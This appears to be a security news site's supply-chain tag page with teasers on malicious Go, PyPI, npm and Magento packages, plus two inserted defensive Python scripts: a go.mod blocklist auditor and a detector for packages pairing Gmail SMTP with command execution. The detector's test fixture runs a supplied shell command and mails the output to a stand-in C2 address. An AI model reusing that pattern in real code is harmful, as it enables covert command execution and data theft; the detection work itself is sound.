Tag: supply-chain
-
Sansec uncovered a supply chain attack via 21 backdoored Magento extensions
Supply chain attack via 21 backdoored Magento extensions hit 500 to 1,000 e-stores, including a $40B multinational. Sansec researchers reported that multiple vendors were hacked in a coordinated supply chain attack; the experts discovered that a backdoor was hidden in 21 applications. Curiously, the malicious code was injected 6 years ago, but the supply chain attack was…
-
Inside the Relentless Liability Pressures Facing CISOs
SolarWinds CISO Tim Brown’s Case Shows Personal, Legal and Health Risks for CISOs. CISOs face tremendous stress in dealing with regulatory scrutiny and legal exposure in the wake of a data breach. SolarWinds CISO Tim Brown shares the personal and professional impact of Securities and Exchange Commission charges against him after the 2020 SolarWinds supply…
-
Hackers Weaponize Go Modules to Deliver Disk-Wiping Malware, Causing Massive Data Loss
Tags: attack, cyber, cybersecurity, data, exploit, github, hacker, malicious, malware, programming, sans, supply-chain
Cybersecurity researchers uncovered a sophisticated supply chain attack targeting the Go programming language ecosystem in April 2025. Hackers have weaponized three malicious Go modules (github[.]com/truthfulpharm/prototransform, github[.]com/blankloggia/go-mcp, and github[.]com/steelpoor/tlsproxy) to deploy devastating disk-wiping malware. Leveraging the decentralized nature of Go’s module system, where developers directly import dependencies from public repositories like GitHub without centralized gatekeeping, attackers exploit namespace…
-
Malicious Go Modules Deliver Disk-Wiping Linux Malware in Advanced Supply Chain Attack
Cybersecurity researchers have discovered three malicious Go modules that include obfuscated code to fetch next-stage payloads that can irrevocably overwrite a Linux system’s primary disk and render it unbootable. The names of the packages are: github[.]com/truthfulpharm/prototransform, github[.]com/blankloggia/go-mcp and github[.]com/steelpoor/tlsproxy. “Despite appearing legitimate, …” First seen on thehackernews.com Jump to article: thehackernews.com/2025/05/malicious-go-modules-deliver-disk.html
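The two Go-module reports above name the malicious module paths but do not show the check a team would run against its own builds. The following is an added example, not code from either report: it parses a go.mod, flags any required module whose path is on a blocklist seeded with the three module paths named above (re-fanged from the `[.]` notation), and separately reports modules that have no content hash in go.sum, since a dependency pulled in without a recorded hash escapes the checksum database. The sample go.mod and go.sum, the helper names and the blocklist layout are this editor's constructions.

```python
"""Audit a Go module's go.mod/go.sum against known-malicious module paths.

Added example, not code from the reports quoted above. The three module paths
are the ones the reports name; the sample files and helper names are constructed.
"""
import re

# Module paths named in the reports above, re-fanged from the "[.]" notation.
KNOWN_MALICIOUS = {
    "github.com/truthfulpharm/prototransform",
    "github.com/blankloggia/go-mcp",
    "github.com/steelpoor/tlsproxy",
}

# Constructed sample go.mod: one legitimate dependency, one blocklisted direct
# dependency (single-line require) and one blocklisted indirect dependency.
SAMPLE_GO_MOD = """\
module example.com/app

go 1.22

require github.com/steelpoor/tlsproxy v0.1.0

require (
\tgolang.org/x/text v0.14.0
\tgithub.com/blankloggia/go-mcp v1.2.3 // indirect
)
"""

# Constructed sample go.sum: go-mcp has no hash entry, so the go.sum check
# reports it independently of the blocklist.
SAMPLE_GO_SUM = """\
golang.org/x/text v0.14.0 h1:AAAA
golang.org/x/text v0.14.0/go.mod h1:BBBB
github.com/steelpoor/tlsproxy v0.1.0 h1:CCCC
github.com/steelpoor/tlsproxy v0.1.0/go.mod h1:DDDD
"""

_REQ_LINE = re.compile(r"^(\S+)\s+(v\S+)")


def parse_requirements(go_mod: str) -> list[tuple[str, str, bool]]:
    """Return (module_path, version, indirect) for every require directive.

    Handles the single-line form and the parenthesised block form; trailing
    comments are stripped before matching, but "// indirect" is remembered.
    """
    reqs = []
    in_block = False
    for raw in go_mod.splitlines():
        line = raw.split("//", 1)[0].strip()
        indirect = "// indirect" in raw
        if not line:
            continue
        if in_block:
            if line == ")":
                in_block = False
                continue
            m = _REQ_LINE.match(line)
        elif line == "require (":
            in_block = True
            continue
        elif line.startswith("require "):
            m = _REQ_LINE.match(line[len("require "):].strip())
        else:
            continue
        if m:
            reqs.append((m.group(1), m.group(2), indirect))
    return reqs


def parse_go_sum(go_sum: str) -> set[tuple[str, str]]:
    """Return (module_path, version) pairs that carry a content hash (not /go.mod)."""
    hashed = set()
    for line in go_sum.splitlines():
        parts = line.split()
        if len(parts) == 3 and not parts[1].endswith("/go.mod"):
            hashed.add((parts[0], parts[1]))
    return hashed


def audit(go_mod: str, go_sum: str, blocklist=KNOWN_MALICIOUS) -> list[str]:
    """Return one finding per problem; an empty list means no finding."""
    findings = []
    hashed = parse_go_sum(go_sum)
    for path, version, indirect in parse_requirements(go_mod):
        kind = "indirect" if indirect else "direct"
        if path in blocklist:
            findings.append(f"BLOCKLISTED {kind} dependency {path}@{version}")
        if (path, version) not in hashed:
            findings.append(f"NO go.sum HASH for {path}@{version}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_GO_MOD, SAMPLE_GO_SUM):
        print(finding)
```

Run it against a real checkout by reading `go.mod` and `go.sum` from disk in place of the constructed samples; a blocklist hit in an indirect dependency is the case to look for, since the malicious path never appears in your own import statements.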
-
Hackers Exploit Critical NodeJS Vulnerabilities to Hijack Jenkins Agents for RCE
Tags: cyber, exploit, flaw, github, hacker, infrastructure, rce, remote-code-execution, risk, supply-chain, vulnerability
Security researchers have identified critical vulnerabilities in the Node.js CI/CD infrastructure, exposing internal Jenkins agents to remote code execution and raising the risk of supply chain attacks. These flaws stemmed from the integration and communication gaps between multiple DevOps platforms (specifically GitHub Apps, GitHub Actions workflows, and Jenkins pipelines) that collectively manage Node.js’ continuous integration processes. Exploiting…
-
Magento supply chain attack compromises hundreds of e-stores
A supply chain attack involving 21 backdoored Magento extensions has compromised between 500 and 1,000 e-commerce stores, including one belonging to a $40 billion multinational. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/magento-supply-chain-attack-compromises-hundreds-of-e-stores/
-
Seven Malicious Packages Exploit Gmail SMTP to Run Harmful Commands
Tags: control, cyber, exploit, malicious, open-source, security-incident, service, supply-chain, threat
A major supply chain security incident has rocked the Python open-source community as researchers at Socket’s Threat Research Team uncovered seven interconnected malicious packages published on the Python Package Index (PyPI). These packages (Coffin-Codes-Pro, Coffin-Codes-NET2, Coffin-Codes-NET, Coffin-Codes-2022, Coffin2022, Coffin-Grave, and cfc-bsb) were ingeniously designed to exploit Gmail’s SMTP service, establishing covert command-and-control tunnels and enabling attackers to execute…
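A static triage heuristic for the pattern the PyPI report above describes, added here as an example and not code from Socket's report or from the packages it names: it walks a module's AST and flags the combination of an `smtplib` connection to `smtp.gmail.com` with an exec-style call in the same module. The host and sink name sets, the two sample sources and the helper names are this editor's assumptions, constructed for illustration; the heuristic is a review aid, not proof of malice.

```python
"""Flag Python sources that pair Gmail SMTP with a command-execution sink.

Added example (not Socket's code or the packages' code). The name sets below are
assumptions about what such a package would have to call; the sample sources
are constructed and do not reproduce any real package.
"""
import ast

GMAIL_SMTP_HOSTS = {"smtp.gmail.com"}
SMTP_CLASSES = {"SMTP", "SMTP_SSL"}
# Exec-style sinks by final attribute/bare name. "run"/"call" are deliberately
# broad (they also match asyncio.run etc.), so a hit is a triage signal only.
EXEC_SINKS = {"exec", "eval", "system", "Popen", "run", "call", "check_output"}

# Constructed sample: logs in to Gmail SMTP and runs an attacker-supplied command.
SUSPICIOUS_SRC = '''
import smtplib, subprocess
def beacon(cmd):
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login("user@example.invalid", "app-password")
    out = subprocess.run(cmd, shell=True, capture_output=True).stdout
    s.sendmail("user@example.invalid", "c2@example.invalid", out.decode())
'''

# Constructed sample: Gmail SMTP used only to send a notification, no sink.
BENIGN_MAIL_SRC = '''
import smtplib
def notify(msg):
    with smtplib.SMTP("smtp.gmail.com", 587) as s:
        s.starttls()
        s.sendmail("a@example.invalid", "b@example.invalid", msg)
'''


def _call_name(node: ast.Call) -> str:
    """Return the bare or final-attribute name a call targets, e.g. 'SMTP_SSL', 'run'."""
    f = node.func
    if isinstance(f, ast.Attribute):
        return f.attr
    if isinstance(f, ast.Name):
        return f.id
    return ""


def _string_args(node: ast.Call):
    """Yield every literal string passed positionally or by keyword."""
    for arg in node.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            yield arg.value
    for kw in node.keywords:
        if isinstance(kw.value, ast.Constant) and isinstance(kw.value.value, str):
            yield kw.value.value


def scan_source(src: str) -> dict:
    """Return line numbers of Gmail SMTP connections and exec sinks, plus a verdict."""
    tree = ast.parse(src)
    gmail_smtp, exec_calls = [], []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name in SMTP_CLASSES and any(h in GMAIL_SMTP_HOSTS for h in _string_args(node)):
            gmail_smtp.append(node.lineno)
        elif name in EXEC_SINKS:
            exec_calls.append(node.lineno)
    return {
        "gmail_smtp_lines": gmail_smtp,
        "exec_sink_lines": exec_calls,
        # Both behaviours in one module is the combination worth a manual look.
        "suspicious": bool(gmail_smtp and exec_calls),
    }


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SRC), ("benign", BENIGN_MAIL_SRC)):
        print(label, scan_source(src))
```

Point `scan_source` at each `.py` file in an unpacked wheel or sdist before installing it. The check misses hosts assembled at runtime or decoded from obfuscated strings, which is why the reports above describe the code as obfuscated; treat a clean result as absence of this one pattern, not as a clean package.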
-
Operational impacts top list of vendor risk worries, study finds
The report comes as years of supply chain cyberattacks shine a spotlight on third-party risks. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/third-party-risk-cyberattacks-supply-chain-ey-survey/746877/
-
How CISOs Can Strengthen Supply Chain Security in 2025
The responsibilities of Chief Information Security Officers (CISOs) are rapidly evolving as digital transformation and global interconnectivity reshape the modern supply chain. In 2025, the supply chain will be more than just a logistical function; it will be a complex, dynamic web of partners, vendors, and technologies, each introducing new vulnerabilities and attack vectors. High-profile…
-
The CISO’s Guide to Effective Cloud Security Strategies
As organizations accelerate cloud adoption, CISOs face unprecedented challenges securing dynamic, multi-cloud environments. The shift to cloud-native architectures, hybrid workloads, and decentralized data storage has expanded the attack surface, exposing enterprises to sophisticated threats like supply chain compromises, misconfigured APIs, and insider risks. With 70% of breaches now linked to cloud assets, CISOs must balance…
-
CNAPP buying guide
Tags: access, ai, application-security, attack, authentication, cloud, container, detection, edr, encryption, framework, group, ibm, infrastructure, intelligence, kubernetes, linux, ml, monitoring, network, open-source, risk-management, saas, soar, software, supply-chain, threat, tool, vmware
-
Securing the invisible: Supply chain security trends
Adversaries are infiltrating upstream software, hardware, and vendor relationships to quietly compromise downstream targets. Whether it’s a malicious update injected into a … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/04/30/supply-chain-security-trends/
-
JPMorgan Chase CISO Warns of SaaS Security Crisis and Supply Chain Risk
In an open letter, Patrick Opet, Chief Information Security Officer (CISO) at JPMorgan Chase, raises a critical alarm First seen on securityonline.info Jump to article: securityonline.info/jpmorgan-chase-ciso-warns-of-saas-security-crisis-and-supply-chain-risk/
-
AI-generated code could be a disaster for the software supply chain. Here’s why.
LLM-produced code could make us much more vulnerable to supply-chain attacks. First seen on arstechnica.com Jump to article: arstechnica.com/security/2025/04/ai-generated-code-could-be-a-disaster-for-the-software-supply-chain-heres-why/
-
JPMorgan Chase CISO warns software industry on supply chain security
In an open letter, Patrick Opet said third-party vendors need to embrace secure development practices over speed to market. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/jpmorgan-chase-ciso–software-supply-chain-security/746476/
-
The API Imperative: Securing Agentic AI and Beyond
We recently released The Rise of Agentic AI, our API ThreatStats report for Q1 2025, finding that evolving API threats are fueled by the rise of agentic AI systems, growing complexity in cloud-native infrastructure, and a surge in software supply chain risks, and uncovered patterns and actionable insights to help organizations prioritize risks and harden their…
-
Most critical vulnerabilities aren’t worth your attention
Web applications face a wide range of risks, including known-exploitable vulnerabilities, supply chain attacks, and insecure identity configurations in CI/CD, according to the … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/04/28/datadog-state-of-devsecops-2025/
-
SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 43
Tags: attack, backdoor, botnet, china, crypto, fraud, infrastructure, international, malware, nfc, rust, supply-chain
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Inside Gamaredon’s PteroLNK: Dead Drop Resolvers and evasive Infrastructure; XRP supply chain attack: Official NPM package infected with crypto stealing backdoor; SuperCard X: exposing a Chinese-speaker MaaS for NFC Relay fraud operation; New Rust Botnet “RustoBot
-
What is the xBOM?
Tags: cloud, cryptography, cyber, Hardware, international, resilience, risk, sbom, service, software, supply-chain, technology, tool
-
ISMG Editors: Top 2025 Breach Trends From Verizon
Also: Supply Chain Security in Wake of US Tariffs, AI’s Role in the SOC. In this week’s update, ISMG editors discussed takeaways from Verizon’s annual Data Breach Investigations Report, the cybersecurity ripple effects of the disruptive U.S. tariff policy, and why artificial intelligence tools still aren’t ready to take over the security operations center. First…
-
Three-Year Go Module Mirror Backdoor Exposed: Supply Chain Attack
Discover how a backdoored Go package exploited the module mirror for 3+ years. Learn vital security practices to safeguard your code. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/04/three-year-go-module-mirror-backdoor-exposed-supply-chain-attack/
-
Operation SyncHole: Lazarus APT targets supply chains in South Korea
The North Korea-linked Lazarus Group targeted at least six firms in South Korea in a cyber espionage campaign called Operation SyncHole. Kaspersky researchers reported that the North Korea-linked APT group Lazarus targeted at least six firms in South Korea in a cyber espionage campaign tracked as Operation SyncHole. The campaign has been active since at…
-
Software supply chain security AI agents take action
Three software supply chain security vendors join the AI agent trend that is sweeping tech, as AI-generated code threatens to overwhelm human security pros. First seen on techtarget.com Jump to article: www.techtarget.com/searchitoperations/news/366623140/Software-supply-chain-security-AI-agents-take-action
-
Backdoor Found in Official XRP Ledger NPM Package
XRP Ledger SDK hit by supply chain attack: Malicious NPM versions stole private keys; users urged to update… First seen on hackread.com Jump to article: hackread.com/backdoor-found-in-official-xrp-ledger-npm-package/
-
HYCU Tackles SaaS Data Protection With New R-Shield Solution
HYCU introduces R-Shield to provide comprehensive cyber resilience across SaaS, cloud, and on-premises environments as organizations face growing supply chain attacks. First seen on securityboulevard.com Jump to article: securityboulevard.com/2025/04/hycu-tackles-saas-data-protection-with-new-r-shield-solution/

